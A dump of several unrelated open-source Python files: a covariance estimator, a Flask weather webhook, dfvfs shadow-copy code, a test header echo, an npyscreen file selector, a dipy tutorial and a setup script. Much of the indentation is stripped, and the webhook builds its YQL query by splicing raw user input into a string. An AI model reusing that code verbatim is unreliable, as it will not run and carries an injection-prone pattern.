If True, data are not centered before computation.
Useful when working with data whose mean is almost, but not exactly
zero.
If False (default), data are centered before computation.
Attributes
----------
covariance_ : 2D ndarray, shape (n_features, n_features)
Estimated covariance matrix
precision_ : 2D ndarray, shape (n_features, n_features)
Estimated pseudo-inverse matrix.
(stored only if store_precision is True)
"""
def __init__(self, store_precision=True, assume_centered=False):
self.store_precision = store_precision
self.assume_centered = assume_centered
def _set_covariance(self, covariance):
"""Saves the covariance and precision estimates
        Storage is done according to `self.store_precision`.
Precision stored only if invertible.
Parameters
----------
covariance : 2D ndarray, shape (n_features, n_features)
Estimated covariance matrix to be stored, and from which precision
is computed.
"""
covariance = check_array(covariance)
# set covariance
self.covariance_ = covariance
# set precision
if self.store_precision:
self.precision_ = pinvh(covariance)
else:
self.precision_ = None
def get_precision(self):
"""Getter for the precision matrix.
Returns
-------
precision_ : array-like,
The precision matrix associated to the current covariance object.
"""
if self.store_precision:
precision = self.precision_
else:
precision = pinvh(self.covariance_)
return precision
def fit(self, X, y=None):
"""Fits the Maximum Likelihood Estimator covariance model
according to the given training data and parameters.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data, where n_samples is the number of samples and
n_features is the number of features.
        y : not used, present for API consistency purposes.
Returns
-------
self : object
Returns self.
"""
X = check_array(X)
if self.assume_centered:
self.location_ = np.zeros(X.shape[1])
else:
self.location_ = X.mean(0)
covariance = empirical_covariance(
X, assume_centered=self.assume_centered)
self._set_covariance(covariance)
return self
def score(self, X_test, y=None):
"""Computes the log-likelihood of a Gaussian data set with
`self.covariance_` as an estimator of its covariance matrix.
Parameters
----------
X_test : array-like, shape = [n_samples, n_features]
Test data of which we compute the likelihood, where n_samples is
the number of samples and n_features is the number of features.
            X_test is assumed to be drawn from the same distribution as
the data used in fit (including centering).
        y : not used, present for API consistency purposes.
Returns
-------
res : float
The likelihood of the data set with `self.covariance_` as an
estimator of its covariance matrix.
"""
# compute empirical covariance of the test set
test_cov = empirical_covariance(
X_test - self.location_, assume_centered=True)
# compute log likelihood
res = log_likelihood(test_cov, self.get_precision())
return res
def error_norm(self, comp_cov, norm='frobenius', scaling=True,
squared=True):
"""Computes the Mean Squared Error between two covariance estimators.
(In the sense of the Frobenius norm).
Parameters
----------
comp_cov : array-like, shape = [n_features, n_features]
The covariance to compare with.
norm : str
The type of norm used to compute the error. Available error types:
- 'frobenius' (default): sqrt(tr(A^t.A))
            - 'spectral': sqrt(max(eigenvalues(A^t.A)))
where A is the error ``(comp_cov - self.covariance_)``.
scaling : bool
If True (default), the squared error norm is divided by n_features.
If False, the squared error norm is not rescaled.
squared : bool
Whether to compute the squared error norm or the error norm.
If True (default), the squared error norm is returned.
If False, the error norm is returned.
Returns
-------
The Mean Squared Error (in the sense of the Frobenius norm) between
`self` and `comp_cov` covariance estimators.
"""
# compute the error
error = comp_cov - self.covariance_
# compute the error norm
if norm == "frobenius":
squared_norm = np.sum(error ** 2)
elif norm == "spectral":
squared_norm = np.amax(linalg.svdvals(np.dot(error.T, error)))
else:
raise NotImplementedError(
"Only spectral and frobenius norms are implemented")
# optionally scale the error norm
if scaling:
squared_norm = squared_norm / error.shape[0]
# finally get either the squared norm or the norm
if squared:
result = squared_norm
else:
result = np.sqrt(squared_norm)
return result
def mahalanobis(self, observations):
"""Computes the squared Mahalanobis distances of given observations.
Parameters
----------
observations : array-like, shape = [n_observations, n_features]
            The observations, the Mahalanobis distances of which we
            compute. Observations are assumed to be drawn from the same
            distribution as the data used in fit.
Returns
-------
mahalanobis_distance : array, shape = [n_observations,]
Squared Mahalanobis distances of the observations.
"""
precision = self.get_precision()
# compute mahalanobis distances
centered_obs = observations - self.location_
mahalanobis_dist = np.sum(
np.dot(centered_obs, precision) * centered_obs, 1)
return mahalanobis_dist
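# A minimal usage sketch (illustrative only, with hypothetical arrays X and
# X_new), using only the methods defined above:
#
#     cov = EmpiricalCovariance().fit(X)
#     avg_log_lik = cov.score(X_new)   # mean log-likelihood of X_new
#     d2 = cov.mahalanobis(X_new)      # squared Mahalanobis distances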
|
TheChef1212/tardis-speech-backend
|
refs/heads/master
|
app3.py
|
1
|
#!/usr/bin/env python
from __future__ import print_function
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse, urlencode
from urllib.request import urlopen, Request
from urllib.error import HTTPError
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get("result").get("action") != "yahooWeatherForecast":
return {}
baseurl = "https://query.yahooapis.com/v1/public/yql?"
yql_query = makeYqlQuery(req)
if yql_query is None:
return {}
yql_url = baseurl + urlencode({'q': yql_query}) + "&format=json"
result = urlopen(yql_url).read()
data = json.loads(result)
res = makeWebhookResult(data)
return res
def makeYqlQuery(req):
result = req.get("result")
parameters = result.get("parameters")
city = parameters.get("geo-city")
if city is None:
return None
return "select * from weather.forecast where woeid in (select woeid from geo.places(1) where text='" + city + "')"
def makeWebhookResult(data):
query = data.get('query')
if query is None:
return {}
result = query.get('results')
if result is None:
return {}
channel = result.get('channel')
if channel is None:
return {}
item = channel.get('item')
location = channel.get('location')
units = channel.get('units')
if (location is None) or (item is None) or (units is None):
return {}
condition = item.get('condition')
if condition is None:
return {}
# print(json.dumps(item, indent=4))
speech = "Today in " + location.get('city') + ": " + condition.get('text') + \
", the temperature is " + condition.get('temp') + " " + units.get('temperature')
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
# "data": data,
# "contextOut": [],
"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=False, port=port, host='0.0.0.0')
|
jorik041/dfvfs
|
refs/heads/master
|
dfvfs/vfs/vshadow_file_entry.py
|
2
|
# -*- coding: utf-8 -*-
"""The Volume Shadow Snapshots (VSS) file entry implementation."""
from dfvfs.lib import date_time
from dfvfs.lib import definitions
from dfvfs.lib import errors
from dfvfs.lib import vshadow
from dfvfs.path import vshadow_path_spec
from dfvfs.vfs import file_entry
from dfvfs.vfs import vfs_stat
class VShadowDirectory(file_entry.Directory):
"""Class that implements a directory object using pyvshadow."""
def _EntriesGenerator(self):
"""Retrieves directory entries.
Since a directory can contain a vast number of entries using
a generator is more memory efficient.
Yields:
A path specification (instance of path.VShadowPathSpec).
"""
# Only the virtual root file has directory entries.
store_index = getattr(self.path_spec, u'store_index', None)
if store_index is not None:
return
location = getattr(self.path_spec, u'location', None)
if location is None or location != self._file_system.LOCATION_ROOT:
return
vshadow_volume = self._file_system.GetVShadowVolume()
for store_index in range(0, vshadow_volume.number_of_stores):
yield vshadow_path_spec.VShadowPathSpec(
location=u'/vss{0:d}'.format(store_index + 1),
store_index=store_index, parent=self.path_spec.parent)
class VShadowFileEntry(file_entry.FileEntry):
"""Class that implements a file entry object using pyvshadow."""
TYPE_INDICATOR = definitions.TYPE_INDICATOR_VSHADOW
def __init__(
self, resolver_context, file_system, path_spec, is_root=False,
is_virtual=False):
"""Initializes the file entry object.
Args:
resolver_context: the resolver context (instance of resolver.Context).
file_system: the file system object (instance of vfs.FileSystem).
path_spec: the path specification (instance of path.PathSpec).
is_root: optional boolean value to indicate if the file entry is
the root file entry of the corresponding file system.
The default is False.
is_virtual: optional boolean value to indicate if the file entry is
a virtual file entry emulated by the corresponding file
system. The default is False.
"""
super(VShadowFileEntry, self).__init__(
resolver_context, file_system, path_spec, is_root=is_root,
is_virtual=is_virtual)
self._name = None
def _GetDirectory(self):
"""Retrieves the directory object (instance of VShadowDirectory)."""
if self._stat_object is None:
self._stat_object = self._GetStat()
if (self._stat_object and
self._stat_object.type == self._stat_object.TYPE_DIRECTORY):
return VShadowDirectory(self._file_system, self.path_spec)
return
def _GetStat(self):
"""Retrieves the stat object.
Returns:
The stat object (instance of vfs.VFSStat).
Raises:
BackEndError: when the vshadow store is missing in a non-virtual
file entry.
"""
vshadow_store = self.GetVShadowStore()
if not self._is_virtual and vshadow_store is None:
raise errors.BackEndError(
u'Missing vshadow store in non-virtual file entry.')
stat_object = vfs_stat.VFSStat()
# File data stat information.
if vshadow_store is not None:
stat_object.size = vshadow_store.volume_size
# Date and time stat information.
if vshadow_store is not None:
timestamp = date_time.PosixTimestamp.FromFiletime(
vshadow_store.get_creation_time_as_integer())
if timestamp is not None:
stat_object.crtime = timestamp
# Ownership and permissions stat information.
# File entry type stat information.
# The root file entry is virtual and should have type directory.
if self._is_virtual:
stat_object.type = stat_object.TYPE_DIRECTORY
else:
stat_object.type = stat_object.TYPE_FILE
return stat_object
@property
def name(self):
"""The name of the file entry, which does not include the full path."""
if self._name is None:
location = getattr(self.path_spec, u'location', None)
if location is not None:
self._name = self._file_system.BasenamePath(location)
else:
store_index = getattr(self.path_spec, u'store_index', None)
if store_index is not None:
self._name = u'vss{0:d}'.format(store_index + 1)
else:
self._name = u''
return self._name
@property
def sub_file_entries(self):
"""The sub file entries (generator of instance of vfs.FileEntry)."""
if self._directory is None:
self._directory = self._GetDirectory()
if self._directory:
for path_spec in self._directory.entries:
yield VShadowFileEntry(
self._resolver_context, self._file_system, path_spec)
def GetParentFileEntry(self):
"""Retrieves the parent file entry."""
return
def GetVShadowStore(self):
"""Retrieves the VSS store object (instance of pyvshadow.store)."""
store_index = vshadow.VShadowPathSpecGetStoreIndex(self.path_spec)
if store_index is None:
return
vshadow_volume = self._file_system.GetVShadowVolume()
return vshadow_volume.get_store(store_index)
|
bzbarsky/servo
|
refs/heads/master
|
tests/wpt/web-platform-tests/service-workers/service-worker/resources/request-headers.py
|
158
|
import json
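# A wptserve-style handler: main(request, response) may return a (headers, body)
# tuple; this one echoes every request header back to the client as JSON.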
def main(request, response):
data = {key:request.headers[key] for key,value in request.headers.iteritems()}
return [("Content-Type", "application/json")], json.dumps(data)
|
kmonsoor/npyscreen
|
refs/heads/master
|
npyscreen/fmFileSelector.py
|
14
|
from . import fmFormMutt
from . import wgmultiline
from . import wggrid
from . import wgautocomplete
from . import utilNotify
import curses
import os
import os.path
import operator
class FileCommand(wgautocomplete.Filename):
def set_up_handlers(self):
super(FileCommand, self).set_up_handlers()
self.handlers.update ({
curses.ascii.NL: self.h_select_file,
curses.ascii.CR: self.h_select_file,
"^W": self.h_up_level,
})
def h_select_file(self, *args, **keywords):
self.h_exit_down(None)
self.parent.try_exit()
def h_up_level(self, *args, **keywords):
self.value = os.path.split(self.value)[0]
self.cursor_position = len(self.value)
def auto_complete(self, input):
self.value = os.path.expanduser(self.value)
directory, fname = os.path.split(self.value)
# Let's have absolute paths.
directory = os.path.abspath(directory)
if self.value == '':
self.value=directory
try:
flist = os.listdir(directory)
except:
self.show_brief_message("Can't read directory!")
return False
flist = [os.path.join(directory, x) for x in flist]
possibilities = list(filter(
(lambda x: os.path.split(x)[1].startswith(fname)), flist
))
if len(possibilities) == 0:
# can't complete
curses.beep()
self.cursor_position = len(self.value)
elif len(possibilities) == 1:
if self.value != possibilities[0]:
self.value = possibilities[0]
if os.path.isdir(self.value) \
and not self.value.endswith(os.sep):
self.value = self.value + os.sep
self.cursor_position = len(self.value)
elif len(possibilities) > 1:
self.value = os.path.commonprefix(possibilities)
self.cursor_position = len(self.value)
curses.beep()
if os.path.isdir(self.value) and len(possibilities) < 2:
self.parent.wMain.change_dir(self.value)
if os.path.isdir(self.value) \
and not self.value.endswith(os.sep):
self.value = self.value + os.sep
self.cursor_position = len(self.value)
#self.h_exit_up(None)
else:
self.parent.value = directory
self.parent.update_grid()
class FileGrid(wggrid.SimpleGrid):
default_column_number = 3
def set_up_handlers(self):
super(FileGrid, self).set_up_handlers()
self.handlers.update ({
curses.ascii.NL: self.h_select_file,
curses.ascii.CR: self.h_select_file,
curses.ascii.SP: self.h_select_file,
})
def change_dir(self, select_file):
try:
os.listdir(select_file)
except OSError:
utilNotify.notify_wait(title="Error", message="Cannot enter directory.")
return False
self.parent.value = select_file
self.parent.wCommand.value = select_file
self.parent.update_grid()
self.edit_cell = [0, 0]
self.begin_row_display_at = 0
self.begin_col_display_at = 0
return True
    def h_select_file(self, *args, **keywords):
try:
select_file = os.path.join(self.parent.value, self.values[self.edit_cell[0]][self.edit_cell[1]])
select_file = os.path.abspath(select_file)
except (TypeError, IndexError):
self.edit_cell = [0, 0]
return False
if os.path.isdir(select_file):
self.change_dir(select_file)
else:
self.parent.wCommand.value = select_file
self.h_exit_down(None)
def display_value(self, vl):
p = os.path.split(vl)
if p[1]:
return p[1]
else:
return os.path.split(p[0])[1] + os.sep
class FileSelector(fmFormMutt.FormMutt):
MAIN_WIDGET_CLASS = FileGrid
COMMAND_WIDGET_CLASS= FileCommand
BLANK_LINES_BASE = 0
def __init__(self,
select_dir=False, #Select a dir, not a file
must_exist=False, #Selected File must already exist
confirm_if_exists=True,
sort_by_extension=True,
*args, **keywords):
self.select_dir = select_dir
self.must_exist = must_exist
self.confirm_if_exists = confirm_if_exists
self.sort_by_extension = sort_by_extension
super(FileSelector, self).__init__(*args, **keywords)
try:
if not self.value:
self.value = os.getcwd()
except:
self.value = os.getcwd()
def try_exit(self):
if not self.wCommand.value:
self.value=''
self.exit_editing()
return None
# There is a bug in the next three lines
self.wCommand.value = os.path.join(self.value, self.wCommand.value)
self.wCommand.value = os.path.expanduser(self.wCommand.value)
self.wCommand.value = os.path.abspath(self.wCommand.value)
self.value = self.wCommand.value
if self.confirm_if_exists and os.path.exists(self.value):
if not utilNotify.notify_yes_no(title="Confirm", message="Select Existing File?"):
return False
if self.must_exist and not os.path.exists(self.value):
utilNotify.notify_confirm(title="Error", message="Selected filename does not exist.")
return False
if self.select_dir and not os.path.isdir(self.value):
utilNotify.notify_confirm(title="Error", message="Selected filename is not a directory.")
return False
self.exit_editing()
return True
def set_colors(self):
self.wCommand.color = 'IMPORTANT'
self.wCommand.color = 'STANDOUT'
def beforeEditing(self,):
self.adjust_widgets()
self.set_colors()
def update_grid(self,):
if self.value:
self.value = os.path.expanduser(self.value)
if not os.path.exists(self.value):
self.value = os.getcwd()
if os.path.isdir(self.value):
working_dir = self.value
else:
working_dir = os.path.dirname(self.value)
self.wStatus1.value = working_dir
file_list = []
if os.path.abspath(os.path.join(working_dir, '..')) != os.path.abspath(working_dir):
file_list.append('..')
try:
file_list.extend([os.path.join(working_dir, fn) for fn in os.listdir(working_dir)])
except OSError:
utilNotify.notify_wait(title="Error", message="Could not read specified directory.")
# DOES NOT CURRENTLY WORK - EXCEPT FOR THE WORKING DIRECTORY. REFACTOR.
new_file_list= []
for f in file_list:
f = os.path.normpath(f)
if os.path.isdir(f):
new_file_list.append(f + os.sep)
else:
new_file_list.append(f) # + "*")
file_list = new_file_list
del new_file_list
# sort Filelist
file_list.sort()
if self.sort_by_extension:
file_list.sort(key=self.get_extension)
file_list.sort(key=os.path.isdir, reverse=True)
self.wMain.set_grid_values_from_flat_list(file_list, reset_cursor=False)
self.display()
def get_extension(self, fn):
return os.path.splitext(fn)[1]
def adjust_widgets(self):
self.update_grid()
def selectFile(starting_value=None, *args, **keywords):
F = FileSelector(*args, **keywords)
F.set_colors()
F.wCommand.show_bold = True
if starting_value:
if not os.path.exists(os.path.abspath(os.path.expanduser(starting_value))):
F.value = os.getcwd()
else:
F.value = starting_value
F.wCommand.value = starting_value
else:
F.value = os.getcwd()
F.update_grid()
F.display()
F.edit()
return F.wCommand.value
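# A minimal usage sketch (assuming it is called from within a running npyscreen
# application, since the selector is a curses form):
#
#     path = selectFile(starting_value='~', must_exist=True)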
|
omarocegueda/dipy
|
refs/heads/master
|
doc/examples/segment_clustering_metrics.py
|
9
|
"""
===========================================
Tractography Clustering - Available Metrics
===========================================
This page lists available metrics that can be used by the tractography
clustering framework. For every metric a brief description is provided
explaining: what it does, when it's useful and how to use it. If you are not
familiar with the tractography clustering framework, check this tutorial
:ref:`clustering-framework`.
.. contents:: Available Metrics
:local:
:depth: 1
**Note**:
All examples assume a function `get_streamlines` exists. We define such a
simple function here. It imports the necessary modules and loads a small
streamline bundle.
"""
def get_streamlines():
from nibabel import trackvis as tv
from dipy.data import get_data
fname = get_data('fornix')
streams, hdr = tv.read(fname)
streamlines = [i[0] for i in streams]
return streamlines
"""
.. _clustering-examples-AveragePointwiseEuclideanMetric:
Average of Pointwise Euclidean Metric
=====================================
**What:** Instances of `AveragePointwiseEuclideanMetric` first compute the
pointwise Euclidean distance between two sequences *of same length* then
return the average of those distances. This metric takes as inputs two features
that are sequences containing the same number of elements.
**When:** By default the `QuickBundles` clustering will resample your
streamlines on-the-fly so they have 12 points. If for some reason you want
to avoid this and you have made sure all your streamlines already have the
same number of points, you can manually provide an instance of
`AveragePointwiseEuclideanMetric` to `QuickBundles`. Since the default
`Feature` is the `IdentityFeature`, the streamlines won't be resampled, thus
saving some computation time.
**Note:** Inputs must be sequences of same length.
"""
from dipy.viz import fvtk
from dipy.segment.clustering import QuickBundles
from dipy.segment.metric import AveragePointwiseEuclideanMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
# Make sure our streamlines have the same number of points.
from dipy.tracking.streamline import set_number_of_points
streamlines = set_number_of_points(streamlines, nb_points=12)
# Create the instance of `AveragePointwiseEuclideanMetric` to use.
metric = AveragePointwiseEuclideanMetric()
qb = QuickBundles(threshold=10., metric=metric)
clusters = qb.cluster(streamlines)
print("Nb. clusters:", len(clusters))
print("Cluster sizes:", map(len, clusters))
"""
::
Nb. clusters: 4
Cluster sizes: [64, 191, 44, 1]
.. _clustering-examples-SumPointwiseEuclideanMetric:
Sum of Pointwise Euclidean Metric
=================================
**What:** Instances of `SumPointwiseEuclideanMetric` first compute the
pointwise Euclidean distance between two sequences *of same length* then
return the sum of those distances.
**When:** This metric mainly exists because it is used internally by
`AveragePointwiseEuclideanMetric`.
**Note:** Inputs must be sequences of same length.
"""
from dipy.segment.clustering import QuickBundles
from dipy.segment.metric import SumPointwiseEuclideanMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
# Make sure our streamlines have the same number of points.
from dipy.tracking.streamline import set_number_of_points
nb_points = 12
streamlines = set_number_of_points(streamlines, nb_points=nb_points)
# Create the instance of `SumPointwiseEuclideanMetric` to use.
metric = SumPointwiseEuclideanMetric()
qb = QuickBundles(threshold=10.*nb_points, metric=metric)
clusters = qb.cluster(streamlines)
print("Nb. clusters:", len(clusters))
print("Cluster sizes:", map(len, clusters))
"""
::
Nb. clusters: 4
Cluster sizes: [64, 191, 44, 1]
.. _clustering-examples-MinimumAverageDirectFlipMetric:
Minimum Average Direct Flip Metric (MDF)
========================================
**What:** It is the metric used in the QuickBundles algorithm [Garyfallidis12]_.
Instances of `MinimumAverageDirectFlipMetric` first compute the
direct distance *d1* by taking the average of the pointwise
Euclidean distances between two sequences *of same length*. Reverse
one of the two sequences and compute the flip distance *d2* using the same
approach as for *d1*. Then, return the minimum between *d1* and *d2*.
**When:** This is the metric used by default in `QuickBundles`. Because it
takes the minimum of the direct and flipped distances, it is insensitive to
the head-tail orientation of the streamlines.
**Note:** Inputs must be sequences of same length.
"""
from dipy.segment.metric import MinimumAverageDirectFlipMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
# Make sure our streamlines have the same number of points.
from dipy.tracking.streamline import set_number_of_points
streamlines = set_number_of_points(streamlines, nb_points=20)
# Create the instance of `MinimumAverageDirectFlipMetric` to use.
metric = MinimumAverageDirectFlipMetric()
d = metric.dist(streamlines[0], streamlines[1])
print("MDF distance between the first two streamlines: ", d)
"""
::
MDF distance between the first two streamlines: 11.681308709622542
.. _clustering-examples-MinimumAverageDirectFlipMetric:
Cosine Metric
=============
**What:** Instances of `CosineMetric` compute the cosine distance between two
vectors (for more information see the
`wiki page <https://en.wikipedia.org/wiki/Cosine_similarity>`_).
**When:** This metric can be useful when you *only* need information about the
orientation of a streamline.
**Note:** Inputs must be vectors (i.e. 1D array).
"""
import numpy as np
from dipy.viz import fvtk
from dipy.segment.clustering import QuickBundles
from dipy.segment.metric import VectorOfEndpointsFeature
from dipy.segment.metric import CosineMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
feature = VectorOfEndpointsFeature()
metric = CosineMetric(feature)
qb = QuickBundles(threshold=0.1, metric=metric)
clusters = qb.cluster(streamlines)
# Color each streamline according to the cluster they belong to.
colormap = fvtk.create_colormap(np.arange(len(clusters)))
colormap_full = np.ones((len(streamlines), 3))
for cluster, color in zip(clusters, colormap):
colormap_full[cluster.indices] = color
# Visualization
ren = fvtk.ren()
fvtk.clear(ren)
ren.SetBackground(0, 0, 0)
fvtk.add(ren, fvtk.streamtube(streamlines, colormap_full))
fvtk.record(ren, n_frames=1, out_path='cosine_metric.png', size=(600, 600))
"""
.. figure:: cosine_metric.png
:align: center
**Showing the streamlines colored according to their orientation**.
.. include:: ../links_names.inc
.. [Garyfallidis12] Garyfallidis E. et al., QuickBundles a method for
tractography simplification, Frontiers in Neuroscience, vol
6, no 175, 2012.
"""
|
ClaudiaSaxer/PlasoScaffolder
|
refs/heads/master
|
src/setup.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""This is the setup file for the project."""
from setuptools import find_packages
from setuptools import setup
setup(name='plasoscaffolder',
version='0.1',
packages=find_packages(),
include_package_data=True,
package_data={'plasoscaffolder.bll.templates': ['*.jinja2'],'':['.style.yapf']},
install_requires=['Click>=6.7',
'setuptools>=35.0.2',
'jinja2>=2.9.6',
'colorama>=0.3.7',
'yapf==0.16.1',
'pexpect>=4.2.1'],
entry_points={'console_scripts': [
'plasoscaffolder=plasoscaffolder.frontend.main:entry_point']},
# metadata for upload to PyPI
author="Claudia Saxer",
description="This is a scaffolder for sqlite plugins for plaso.",
keywords="plaso scaffolder",
url="http://plasoscaffolder.readthedocs.io")
|